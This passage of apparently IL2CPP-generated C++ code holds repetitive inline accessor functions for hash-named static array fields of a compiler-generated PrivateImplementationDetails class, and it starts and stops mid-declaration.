set_U362BAB0F245E66C3EB982CF5A7015F0A7C3382283_48(__StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A value) { ___62BAB0F245E66C3EB982CF5A7015F0A7C3382283_48 = value; } inline static int32_t get_offset_of_U3646036A65DECCD6835C914A46E6E44B729433B60_49() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___646036A65DECCD6835C914A46E6E44B729433B60_49)); } inline __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 get_U3646036A65DECCD6835C914A46E6E44B729433B60_49() const { return ___646036A65DECCD6835C914A46E6E44B729433B60_49; } inline __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 * get_address_of_U3646036A65DECCD6835C914A46E6E44B729433B60_49() { return &___646036A65DECCD6835C914A46E6E44B729433B60_49; } inline void set_U3646036A65DECCD6835C914A46E6E44B729433B60_49(__StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 value) { ___646036A65DECCD6835C914A46E6E44B729433B60_49 = value; } inline static int32_t get_offset_of_U365E32B4E150FD8D24B93B0D42A17F1DAD146162B_50() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___65E32B4E150FD8D24B93B0D42A17F1DAD146162B_50)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U365E32B4E150FD8D24B93B0D42A17F1DAD146162B_50() const { return ___65E32B4E150FD8D24B93B0D42A17F1DAD146162B_50; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U365E32B4E150FD8D24B93B0D42A17F1DAD146162B_50() { return &___65E32B4E150FD8D24B93B0D42A17F1DAD146162B_50; } inline void set_U365E32B4E150FD8D24B93B0D42A17F1DAD146162B_50(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___65E32B4E150FD8D24B93B0D42A17F1DAD146162B_50 = value; } inline static int32_t get_offset_of_U36770974FEF1E98B9C1864370E2B5B786EB0EA39E_51() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___6770974FEF1E98B9C1864370E2B5B786EB0EA39E_51)); } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A get_U36770974FEF1E98B9C1864370E2B5B786EB0EA39E_51() const { return ___6770974FEF1E98B9C1864370E2B5B786EB0EA39E_51; } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A * get_address_of_U36770974FEF1E98B9C1864370E2B5B786EB0EA39E_51() { return &___6770974FEF1E98B9C1864370E2B5B786EB0EA39E_51; } inline void set_U36770974FEF1E98B9C1864370E2B5B786EB0EA39E_51(__StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A value) { ___6770974FEF1E98B9C1864370E2B5B786EB0EA39E_51 = value; } inline static int32_t get_offset_of_U367EEAD805D708D9AA4E14BF747E44CED801744F3_52() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___67EEAD805D708D9AA4E14BF747E44CED801744F3_52)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U367EEAD805D708D9AA4E14BF747E44CED801744F3_52() const { return ___67EEAD805D708D9AA4E14BF747E44CED801744F3_52; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U367EEAD805D708D9AA4E14BF747E44CED801744F3_52() { return &___67EEAD805D708D9AA4E14BF747E44CED801744F3_52; } inline void set_U367EEAD805D708D9AA4E14BF747E44CED801744F3_52(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___67EEAD805D708D9AA4E14BF747E44CED801744F3_52 = value; } inline static int32_t get_offset_of_U36C71197D228427B2864C69B357FEF73D8C9D59DF_53() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___6C71197D228427B2864C69B357FEF73D8C9D59DF_53)); } inline __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 get_U36C71197D228427B2864C69B357FEF73D8C9D59DF_53() const { return ___6C71197D228427B2864C69B357FEF73D8C9D59DF_53; } inline __StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 * get_address_of_U36C71197D228427B2864C69B357FEF73D8C9D59DF_53() { return &___6C71197D228427B2864C69B357FEF73D8C9D59DF_53; } inline void set_U36C71197D228427B2864C69B357FEF73D8C9D59DF_53(__StaticArrayInitTypeSizeU3D120_tBA46FD2E9DA153FD8457EE7F425E8ECC517EA252 value) { ___6C71197D228427B2864C69B357FEF73D8C9D59DF_53 = value; } inline static int32_t get_offset_of_U36D49C9D487D7AD3491ECE08732D68A593CC2038D_54() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___6D49C9D487D7AD3491ECE08732D68A593CC2038D_54)); } inline __StaticArrayInitTypeSizeU3D9_tF0D137C898E06A3CD9FFB079C91D796B9EC8B928 get_U36D49C9D487D7AD3491ECE08732D68A593CC2038D_54() const { return ___6D49C9D487D7AD3491ECE08732D68A593CC2038D_54; } inline __StaticArrayInitTypeSizeU3D9_tF0D137C898E06A3CD9FFB079C91D796B9EC8B928 * get_address_of_U36D49C9D487D7AD3491ECE08732D68A593CC2038D_54() { return &___6D49C9D487D7AD3491ECE08732D68A593CC2038D_54; } inline void set_U36D49C9D487D7AD3491ECE08732D68A593CC2038D_54(__StaticArrayInitTypeSizeU3D9_tF0D137C898E06A3CD9FFB079C91D796B9EC8B928 value) { ___6D49C9D487D7AD3491ECE08732D68A593CC2038D_54 = value; } inline static int32_t get_offset_of_U36D797C11E1D4FB68B6570CF2A92B792433527065_55() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___6D797C11E1D4FB68B6570CF2A92B792433527065_55)); } inline __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 get_U36D797C11E1D4FB68B6570CF2A92B792433527065_55() const { return ___6D797C11E1D4FB68B6570CF2A92B792433527065_55; } inline __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 * get_address_of_U36D797C11E1D4FB68B6570CF2A92B792433527065_55() { return &___6D797C11E1D4FB68B6570CF2A92B792433527065_55; } inline void set_U36D797C11E1D4FB68B6570CF2A92B792433527065_55(__StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 value) { ___6D797C11E1D4FB68B6570CF2A92B792433527065_55 = value; } inline static int32_t get_offset_of_U36E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___6E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56)); } inline __StaticArrayInitTypeSizeU3D3132_t7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333 get_U36E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56() const { return ___6E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56; } inline __StaticArrayInitTypeSizeU3D3132_t7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333 * get_address_of_U36E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56() { return &___6E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56; } inline void set_U36E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56(__StaticArrayInitTypeSizeU3D3132_t7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333 value) { ___6E5DC824F803F8565AF31B42199DAE39FE7F4EA9_56 = value; } inline static int32_t get_offset_of_U36FC754859E4EC74E447048364B216D825C6F8FE7_57() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___6FC754859E4EC74E447048364B216D825C6F8FE7_57)); } inline __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB get_U36FC754859E4EC74E447048364B216D825C6F8FE7_57() const { return ___6FC754859E4EC74E447048364B216D825C6F8FE7_57; } inline __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB * get_address_of_U36FC754859E4EC74E447048364B216D825C6F8FE7_57() { return &___6FC754859E4EC74E447048364B216D825C6F8FE7_57; } inline void set_U36FC754859E4EC74E447048364B216D825C6F8FE7_57(__StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB value) { ___6FC754859E4EC74E447048364B216D825C6F8FE7_57 = value; } inline static int32_t get_offset_of_U3704939CD172085D1295FCE3F1D92431D685D7AA2_58() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___704939CD172085D1295FCE3F1D92431D685D7AA2_58)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U3704939CD172085D1295FCE3F1D92431D685D7AA2_58() const { return ___704939CD172085D1295FCE3F1D92431D685D7AA2_58; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U3704939CD172085D1295FCE3F1D92431D685D7AA2_58() { return &___704939CD172085D1295FCE3F1D92431D685D7AA2_58; } inline void set_U3704939CD172085D1295FCE3F1D92431D685D7AA2_58(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___704939CD172085D1295FCE3F1D92431D685D7AA2_58 = value; } inline static int32_t get_offset_of_U37088AAE49F0627B72729078DE6E3182DDCF8ED99_59() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___7088AAE49F0627B72729078DE6E3182DDCF8ED99_59)); } inline __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 get_U37088AAE49F0627B72729078DE6E3182DDCF8ED99_59() const { return ___7088AAE49F0627B72729078DE6E3182DDCF8ED99_59; } inline __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 * get_address_of_U37088AAE49F0627B72729078DE6E3182DDCF8ED99_59() { return &___7088AAE49F0627B72729078DE6E3182DDCF8ED99_59; } inline void set_U37088AAE49F0627B72729078DE6E3182DDCF8ED99_59(__StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 value) { ___7088AAE49F0627B72729078DE6E3182DDCF8ED99_59 = value; } inline static int32_t get_offset_of_U37341C933A70EAE383CC50C4B945ADB8E08F06737_60() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___7341C933A70EAE383CC50C4B945ADB8E08F06737_60)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U37341C933A70EAE383CC50C4B945ADB8E08F06737_60() const { return ___7341C933A70EAE383CC50C4B945ADB8E08F06737_60; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U37341C933A70EAE383CC50C4B945ADB8E08F06737_60() { return &___7341C933A70EAE383CC50C4B945ADB8E08F06737_60; } inline void set_U37341C933A70EAE383CC50C4B945ADB8E08F06737_60(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___7341C933A70EAE383CC50C4B945ADB8E08F06737_60 = value; } inline static int32_t get_offset_of_U3736D39815215889F11249D9958F6ED12D37B9F57_61() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___736D39815215889F11249D9958F6ED12D37B9F57_61)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U3736D39815215889F11249D9958F6ED12D37B9F57_61() const { return ___736D39815215889F11249D9958F6ED12D37B9F57_61; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U3736D39815215889F11249D9958F6ED12D37B9F57_61() { return &___736D39815215889F11249D9958F6ED12D37B9F57_61; } inline void set_U3736D39815215889F11249D9958F6ED12D37B9F57_61(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___736D39815215889F11249D9958F6ED12D37B9F57_61 = value; } inline static int32_t get_offset_of_U37FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___7FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U37FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62() const { return ___7FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U37FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62() { return &___7FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62; } inline void set_U37FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___7FE820C9CF0F0B90445A71F1D262D22E4F0C4C68_62 = value; } inline static int32_t get_offset_of_U3811A927B7DADD378BE60BBDE794B9277AA9B50EC_63() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___811A927B7DADD378BE60BBDE794B9277AA9B50EC_63)); } inline __StaticArrayInitTypeSizeU3D21252_tCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462 get_U3811A927B7DADD378BE60BBDE794B9277AA9B50EC_63() const { return ___811A927B7DADD378BE60BBDE794B9277AA9B50EC_63; } inline __StaticArrayInitTypeSizeU3D21252_tCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462 * get_address_of_U3811A927B7DADD378BE60BBDE794B9277AA9B50EC_63() { return &___811A927B7DADD378BE60BBDE794B9277AA9B50EC_63; } inline void set_U3811A927B7DADD378BE60BBDE794B9277AA9B50EC_63(__StaticArrayInitTypeSizeU3D21252_tCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462 value) { ___811A927B7DADD378BE60BBDE794B9277AA9B50EC_63 = value; } inline static int32_t get_offset_of_U381917F1E21F3C22B9F916994547A614FB03E968E_64() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___81917F1E21F3C22B9F916994547A614FB03E968E_64)); } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 get_U381917F1E21F3C22B9F916994547A614FB03E968E_64() const { return ___81917F1E21F3C22B9F916994547A614FB03E968E_64; } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 * get_address_of_U381917F1E21F3C22B9F916994547A614FB03E968E_64() { return &___81917F1E21F3C22B9F916994547A614FB03E968E_64; } inline void set_U381917F1E21F3C22B9F916994547A614FB03E968E_64(__StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 value) { ___81917F1E21F3C22B9F916994547A614FB03E968E_64 = value; } inline static int32_t get_offset_of_U3823566DA642D6EA356E15585921F2A4CA23D6760_65() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___823566DA642D6EA356E15585921F2A4CA23D6760_65)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U3823566DA642D6EA356E15585921F2A4CA23D6760_65() const { return ___823566DA642D6EA356E15585921F2A4CA23D6760_65; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U3823566DA642D6EA356E15585921F2A4CA23D6760_65() { return &___823566DA642D6EA356E15585921F2A4CA23D6760_65; } inline void set_U3823566DA642D6EA356E15585921F2A4CA23D6760_65(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___823566DA642D6EA356E15585921F2A4CA23D6760_65 = value; } inline static int32_t get_offset_of_U382C2A59850B2E85BCE1A45A479537A384DF6098D_66() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___82C2A59850B2E85BCE1A45A479537A384DF6098D_66)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_U382C2A59850B2E85BCE1A45A479537A384DF6098D_66() const { return ___82C2A59850B2E85BCE1A45A479537A384DF6098D_66; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_U382C2A59850B2E85BCE1A45A479537A384DF6098D_66() { return &___82C2A59850B2E85BCE1A45A479537A384DF6098D_66; } inline void set_U382C2A59850B2E85BCE1A45A479537A384DF6098D_66(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___82C2A59850B2E85BCE1A45A479537A384DF6098D_66 = value; } inline static int32_t get_offset_of_U382C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___82C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67)); } inline __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F get_U382C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67() const { return ___82C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67; } inline __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F * get_address_of_U382C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67() { return &___82C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67; } inline void set_U382C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67(__StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F value) { ___82C383F8E6E4D3D87AEBB986A5D0077E8AD157C4_67 = value; } inline static int32_t get_offset_of_U386F4F563FA2C61798AE6238D789139739428463A_68() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___86F4F563FA2C61798AE6238D789139739428463A_68)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U386F4F563FA2C61798AE6238D789139739428463A_68() const { return ___86F4F563FA2C61798AE6238D789139739428463A_68; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U386F4F563FA2C61798AE6238D789139739428463A_68() { return &___86F4F563FA2C61798AE6238D789139739428463A_68; } inline void set_U386F4F563FA2C61798AE6238D789139739428463A_68(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___86F4F563FA2C61798AE6238D789139739428463A_68 = value; } inline static int32_t get_offset_of_U3871B9CF85DB352BAADF12BAE8F19857683E385AC_69() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___871B9CF85DB352BAADF12BAE8F19857683E385AC_69)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U3871B9CF85DB352BAADF12BAE8F19857683E385AC_69() const { return ___871B9CF85DB352BAADF12BAE8F19857683E385AC_69; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U3871B9CF85DB352BAADF12BAE8F19857683E385AC_69() { return &___871B9CF85DB352BAADF12BAE8F19857683E385AC_69; } inline void set_U3871B9CF85DB352BAADF12BAE8F19857683E385AC_69(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___871B9CF85DB352BAADF12BAE8F19857683E385AC_69 = value; } inline static int32_t get_offset_of_U389A040451C8CC5C8FB268BE44BDD74964C104155_70() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___89A040451C8CC5C8FB268BE44BDD74964C104155_70)); } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 get_U389A040451C8CC5C8FB268BE44BDD74964C104155_70() const { return ___89A040451C8CC5C8FB268BE44BDD74964C104155_70; } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 * get_address_of_U389A040451C8CC5C8FB268BE44BDD74964C104155_70() { return &___89A040451C8CC5C8FB268BE44BDD74964C104155_70; } inline void set_U389A040451C8CC5C8FB268BE44BDD74964C104155_70(__StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 value) { ___89A040451C8CC5C8FB268BE44BDD74964C104155_70 = value; } inline static int32_t get_offset_of_U38CAA092E783257106251246FF5C97F88D28517A6_71() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___8CAA092E783257106251246FF5C97F88D28517A6_71)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U38CAA092E783257106251246FF5C97F88D28517A6_71() const { return ___8CAA092E783257106251246FF5C97F88D28517A6_71; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U38CAA092E783257106251246FF5C97F88D28517A6_71() { return &___8CAA092E783257106251246FF5C97F88D28517A6_71; } inline void set_U38CAA092E783257106251246FF5C97F88D28517A6_71(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___8CAA092E783257106251246FF5C97F88D28517A6_71 = value; } inline static int32_t get_offset_of_U38D231DD55FE1AD7631BBD0905A17D5EB616C2154_72() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___8D231DD55FE1AD7631BBD0905A17D5EB616C2154_72)); } inline __StaticArrayInitTypeSizeU3D2100_t75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA get_U38D231DD55FE1AD7631BBD0905A17D5EB616C2154_72() const { return ___8D231DD55FE1AD7631BBD0905A17D5EB616C2154_72; } inline __StaticArrayInitTypeSizeU3D2100_t75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA * get_address_of_U38D231DD55FE1AD7631BBD0905A17D5EB616C2154_72() { return &___8D231DD55FE1AD7631BBD0905A17D5EB616C2154_72; } inline void set_U38D231DD55FE1AD7631BBD0905A17D5EB616C2154_72(__StaticArrayInitTypeSizeU3D2100_t75CE52CDAFC7C95EDAB5CF1AF8B2621D502F1FAA value) { ___8D231DD55FE1AD7631BBD0905A17D5EB616C2154_72 = value; } inline static int32_t get_offset_of_U38E10AC2F34545DFBBF3FCBC06055D797A8C99991_73() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___8E10AC2F34545DFBBF3FCBC06055D797A8C99991_73)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U38E10AC2F34545DFBBF3FCBC06055D797A8C99991_73() const { return ___8E10AC2F34545DFBBF3FCBC06055D797A8C99991_73; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U38E10AC2F34545DFBBF3FCBC06055D797A8C99991_73() { return &___8E10AC2F34545DFBBF3FCBC06055D797A8C99991_73; } inline void set_U38E10AC2F34545DFBBF3FCBC06055D797A8C99991_73(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___8E10AC2F34545DFBBF3FCBC06055D797A8C99991_73 = value; } inline static int32_t get_offset_of_U390A0542282A011472F94E97CEAE59F8B3B1A3291_74() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___90A0542282A011472F94E97CEAE59F8B3B1A3291_74)); } inline __StaticArrayInitTypeSizeU3D640_t9C691C15FA1A34F93F102000D5F515E32241C910 get_U390A0542282A011472F94E97CEAE59F8B3B1A3291_74() const { return ___90A0542282A011472F94E97CEAE59F8B3B1A3291_74; } inline __StaticArrayInitTypeSizeU3D640_t9C691C15FA1A34F93F102000D5F515E32241C910 * get_address_of_U390A0542282A011472F94E97CEAE59F8B3B1A3291_74() { return &___90A0542282A011472F94E97CEAE59F8B3B1A3291_74; } inline void set_U390A0542282A011472F94E97CEAE59F8B3B1A3291_74(__StaticArrayInitTypeSizeU3D640_t9C691C15FA1A34F93F102000D5F515E32241C910 value) { ___90A0542282A011472F94E97CEAE59F8B3B1A3291_74 = value; } inline static int32_t get_offset_of_U393A63E90605400F34B49F0EB3361D23C89164BDA_75() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___93A63E90605400F34B49F0EB3361D23C89164BDA_75)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_U393A63E90605400F34B49F0EB3361D23C89164BDA_75() const { return ___93A63E90605400F34B49F0EB3361D23C89164BDA_75; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_U393A63E90605400F34B49F0EB3361D23C89164BDA_75() { return &___93A63E90605400F34B49F0EB3361D23C89164BDA_75; } inline void set_U393A63E90605400F34B49F0EB3361D23C89164BDA_75(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___93A63E90605400F34B49F0EB3361D23C89164BDA_75 = value; } inline static int32_t get_offset_of_U394841DD2F330CCB1089BF413E4FA9B04505152E2_76() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___94841DD2F330CCB1089BF413E4FA9B04505152E2_76)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U394841DD2F330CCB1089BF413E4FA9B04505152E2_76() const { return ___94841DD2F330CCB1089BF413E4FA9B04505152E2_76; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U394841DD2F330CCB1089BF413E4FA9B04505152E2_76() { return &___94841DD2F330CCB1089BF413E4FA9B04505152E2_76; } inline void set_U394841DD2F330CCB1089BF413E4FA9B04505152E2_76(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___94841DD2F330CCB1089BF413E4FA9B04505152E2_76 = value; } inline static int32_t get_offset_of_U395264589E48F94B7857CFF398FB72A537E13EEE2_77() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___95264589E48F94B7857CFF398FB72A537E13EEE2_77)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_U395264589E48F94B7857CFF398FB72A537E13EEE2_77() const { return ___95264589E48F94B7857CFF398FB72A537E13EEE2_77; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_U395264589E48F94B7857CFF398FB72A537E13EEE2_77() { return &___95264589E48F94B7857CFF398FB72A537E13EEE2_77; } inline void set_U395264589E48F94B7857CFF398FB72A537E13EEE2_77(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___95264589E48F94B7857CFF398FB72A537E13EEE2_77 = value; } inline static int32_t 